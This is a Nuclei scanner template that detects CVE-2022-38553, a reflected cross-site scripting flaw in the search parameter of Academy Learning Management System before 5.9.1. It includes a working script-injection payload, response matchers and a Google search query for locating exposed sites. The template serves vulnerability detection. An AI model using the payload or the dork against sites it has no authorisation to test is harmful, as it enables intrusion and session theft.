id: CVE-2022-38553

info:
  name: Academy Learning Management System <5.9.1 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
    - https://github.com/4websecurity/CVE-2022-38553
    - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38553
    - http://academy.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-38553
    cwe-id: CWE-79
    epss-score: 0.00084
    cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    google-query: intext:"Study any topic, anytime"
    verified: true
    vendor: creativeitem
    product: academy_learning_management_system
  tags: cve,cve2022,academylms,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - 'Study any topic'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200